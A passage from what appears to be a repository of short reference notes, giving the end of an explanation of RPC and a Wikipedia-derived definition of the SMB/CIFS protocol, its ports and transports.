2 | Computer operating systems and programs have steadily gotten more complex over the years. With each release, there are more features. The growing intricacy of systems makes it more difficult for developers to avoid errors during the development process. Often, developers create a solution for their system or application when a nearly identical solution has already been devised. This duplication of effort consumes time and money and adds complexity to already complex systems.
3 | RPC is designed to mitigate these issues by providing a common interface between applications. RPC serves as a go–between for client/server communications. RPC is designed to make client/server interaction easier and safer by factoring out common tasks, such as security, synchronization, and data flow handling, into a common library so that developers do not have to dedicate the time and effort into developing their own solutions.
4 | 


--------------------------------------------------------------------------------
/whatis/SMB(CIFS)-definition:
--------------------------------------------------------------------------------
 1 | In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol[3] mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows, where it was known as "Microsoft Windows Network" before the subsequent introduction of Active Directory. Corresponding Windows services are LAN Manager Server (for the server component) and LAN Manager Workstation (for the client component).
 2 | 
 3 | SMB can run on top of the session (and lower) network layers in several ways:
 4 | Directly over TCP, port 445 via the NetBIOS API, which in turn can run on several transports:[6]
 5 | On UDP ports 137, 138 & TCP ports 137, 139 (NetBIOS over TCP/IP);
 6 | On several legacy protocols such as NBF, IPX/SPX.
 7 | The SMB "Inter-Process Communication" (IPC) system provides named pipes and was one of the first inter-process mechanisms commonly available to programmers that provides a means for services to inherit the authentication carried out when a client[clarification needed] first connects to an SMB server.[citation needed]
 8 | 
 9 | https://en.wikipedia.org/wiki/Server_Message_Block
10 | 


--------------------------------------------------------------------------------